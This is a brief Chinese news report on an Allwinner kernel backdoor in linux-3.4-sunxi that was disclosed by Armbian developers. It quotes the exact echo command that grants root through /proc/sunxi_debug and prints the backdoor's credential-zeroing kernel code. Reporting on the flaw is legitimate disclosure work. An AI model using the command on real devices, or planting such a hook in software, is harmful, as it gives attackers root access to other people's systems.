ARM開發板系統項目Armbian的研究人員近日發現,中國芯片廠商全志(Allwinner)在其自己定制的linux-3.4-sunxi系統內核里留下了一個后門,影響多款芯片。據稱,該后門的使用方法很簡單,只需在本地調試中發送一個rootmydevice指令,即可獲取root權限。
具體命令為:echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
這個后門還可以和其他多個指令一樣通過網絡遠程使用,能夠獲取系統信息甚至更改文件。
Armbian開發者稱,這個后門可以在基于全志H3、A83T、H8處理器的設備系統中找到,A64處理器的Pine64系統里同樣可以使用。
不過,這個后門似乎不是全志特意留下來的,更像是全志的開發者在調試操作完畢后,忘記了從系統源代碼中刪掉它。
if(!strncmp("rootmydevice",(char*)buf,12)){ cred = (struct cred *)__task_cred(current); cred->uid = 0; cred->gid = 0; cred->suid = 0; cred->euid = 0; cred->euid = 0; cred->egid = 0; cred->fsuid = 0; cred->fsgid = 0; printk("now you are root "); }[責任編輯:ugmbbc]文章打分